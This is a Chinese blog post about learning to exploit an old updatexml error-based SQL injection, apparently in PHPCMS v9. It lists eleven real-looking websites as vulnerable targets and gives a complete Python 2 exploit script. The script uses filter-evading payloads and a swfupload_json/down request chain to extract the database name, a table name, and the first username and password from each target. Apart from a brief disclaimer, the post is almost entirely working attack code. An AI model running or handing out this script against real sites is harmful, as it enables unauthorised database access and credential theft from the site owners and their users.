一些网站的updatexml报错注入与exp学习编写


漏洞网站

都是老漏洞了(从下面 exp 里用到的 swfupload_json / down 接口来看,应该是 PHPCMS v9 系列的 updatexml 报错注入),我这个新手学习一下。下面的站点列表只是当时的记录:未经授权对他人系统做注入测试是违法的,复现请在自己搭建的靶机上进行。
http://www.d6xiazai.com/
http://www.zgdjzz.cn/
http://www.csuav.com/
http://www.cespc.com/
http://www.dghxjs.cn/
http://www.dqcdzz.cn/
http://www.zdblx.cn/
http://www.zgrczz.cn/
http://www.zgsykx.cn/
http://www.wjhzs.com/
http://www.szxax.com/

exp学习编写

先理解漏洞原理,再参考公开的 PoC 自己动手编写 exp。说明:下面的脚本是 Python 2 写法(print 语句、urllib.quote),并依赖第三方库 requests;payload 里的 %*27、%*20 不是写错,是为了绕过目标的输入过滤,照抄即可。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests
import re
from urllib import quote
 
TIMEOUT = 5  # seconds; passed as the timeout of every requests.get() below
# Placeholder table name. exp() overwrites it with the table found in step 2
# before payload() reads it for the username/password steps (3-5); the
# literal "hex" itself is never a meaningful table.
REQ = "hex"

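def payload(num, req, table=None):
    """Return the injection string for step ``num`` (1-5), or False otherwise.

    The value is what later gets passed as ``src`` to ``swfupload_json``; the
    trailing ``&m=1&modelid=1&f=1&catid=1`` is part of the same string. Every
    step reads one value through ``updatexml(1, concat(0x7e, (<query>), 0x7e), 1)``
    so the target echoes the query result between two ``~`` in its XPATH
    error message; the ``#`` after it comments out the rest of the statement.

    num:   1 -> current database name
           2 -> first table in schema ``req`` (via information_schema.tables)
           3 -> characters 1-16 of the first ``username`` in ``table``
           4 -> characters 1-16 of the first ``password`` in ``table``
           5 -> characters 17-40 of the first ``password`` in ``table``
           anything else -> False
    req:   schema name spliced into step 2; ignored by the other steps
    table: table name for steps 3-5. Defaults to the module global ``REQ``,
           which exp() sets from the step-2 result, so existing two-argument
           callers behave as before.

    The ``*`` inside each percent-escape (``%*27`` for a quote, ``%*20`` for
    a space) is deliberate and must be kept byte-for-byte: presumably the
    target strips ``*`` (and plain ``%27``/``%20``) before URL-decoding, so
    the quote only materialises after its filter has run.
    """
    prefix = "&id=1%*27%*20and%*20updatexml(1,concat(0x7e,("
    suffix = "),0x7e),1)#&m=1&modelid=1&f=1&catid=1"

    if num == 1:
        query = "select%*20database()"
    elif num == 2:
        query = ("select%*20table_name%*20from%*20information_schema.tables"
                 "%*20where%*20table_schema=%*27" + req + "%*27%*20limit%*200,1")
    elif num in (3, 4, 5):
        if table is None:
            table = REQ
        column = "username" if num == 3 else "password"
        # mid(value, start, length): the password is read in two slices
        # because the error message truncates long values.
        span = "17,40" if num == 5 else "1,16"
        query = ("select%*20mid((SELECT%*20" + column + "%*20from%*20" + table
                 + "%*20limit%*200,1)," + span + ")")
    else:
        return False
    return prefix + query + suffix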
        
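def _site_cookies(url):
    """Fetch the wap index page and return the cookie pair later requests need.

    Looks for the ``<prefix>_siteid`` cookie the site sets and returns
    ``{<prefix>_userid: value, <prefix>_siteid: value}``. Returns None when
    no ``*_siteid`` cookie came back. The prefix is taken from the cookie
    name rather than a fixed six-character slice, which produced a wrong
    userid cookie name for any other prefix length.
    """
    index = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
    for c in requests.get(index, timeout=TIMEOUT).cookies:
        if c.name.endswith('_siteid'):
            prefix = c.name[:-len('_siteid')]
            return {prefix + '_userid': c.value, c.name: c.value}
    return None


def _encoded_payload(url, cookies, pay):
    """Pass ``pay`` as ``src`` to swfupload_json and return the ``*_att_json``
    cookie the site answers with (the server-side encoded form of the payload
    that the down action accepts as ``a_k``), or None if it is absent."""
    js = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(pay))
    for c in requests.get(js, cookies=cookies, timeout=TIMEOUT).cookies:
        if c.name.endswith('_att_json'):
            return c.value
    return None


def _leaked_value(url, cookies, enc_payload):
    """Replay ``enc_payload`` as ``a_k`` to the down action and return the text
    the XPATH error echoes between the two ``~`` markers, or None when the
    response carries no such error (the step failed)."""
    target = url + '/index.php?m=content&c=down&a_k=' + enc_payload
    body = requests.get(target, cookies=cookies, timeout=TIMEOUT).content
    matches = re.findall(r"XPATH syntax error: '~(.*?)~' <br />", body)
    if not matches:
        return None
    # The error text is normally echoed twice and the original read the
    # second copy unconditionally, raising IndexError when only one was
    # present; fall back to the single copy instead.
    return matches[1] if len(matches) > 1 else matches[0]


def exp(url):
    """Run the five-step error-based extraction against ``url``.

    Steps (built by ``payload``): 1 = current database, 2 = first table in
    it, 3 = first ``username`` from that table, 4 and 5 = the first
    ``password`` in two slices that are printed joined together.

    Each step is the same request chain: have swfupload_json encode the
    payload into an ``*_att_json`` cookie, replay that value as ``a_k`` to
    the down action, and read the leaked value out of the XPATH error text.
    The site cookies are fetched once up front rather than once per step.

    Returns False when a required cookie is missing, otherwise None (results
    are printed). Network errors raised by ``requests`` propagate. A step
    that leaks nothing prints "column错误" and the run continues with an
    empty value for that step, so later steps may fail the same way.

    Side effect: step 3 rewrites the module global ``REQ`` with the table
    name from step 2, because ``payload`` reads the table for steps 3-5
    from that global.
    """
    global REQ
    cookies = _site_cookies(url)
    if cookies is None:
        return False

    db_name = ''
    table_name = ''
    pw_head = ''
    for num in range(1, 6):
        if num == 2:
            pay = payload(num, db_name)
        elif num == 3:
            REQ = table_name
            pay = payload(num, REQ)
        else:
            pay = payload(num, 'hex')  # second argument is unused by steps 1, 4 and 5

        enc_payload = _encoded_payload(url, cookies, pay)
        if enc_payload is None:
            return False

        value = _leaked_value(url, cookies, enc_payload)
        if value is None:
            print("column错误")
            continue
        if num == 1:
            db_name = value
            print("database:" + value)
        elif num == 2:
            table_name = value
            print("tablename:" + value)
        elif num == 3:
            print("username:" + value)
        elif num == 4:
            pw_head = value
        else:
            print("password:" + pw_head + value)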

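if __name__ == "__main__":
    # Only point this at systems you are authorised to test.
    if len(sys.argv) != 2:
        sys.stderr.write("usage: %s http://target\n" % sys.argv[0])
        sys.exit(1)
    # Every request path is built as url + '/index.php...', so a trailing
    # slash on the argument would produce '//index.php'.
    exp(sys.argv[1].rstrip('/'))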

执行效果

一些网站的updatexml报错注入与exp学习编写
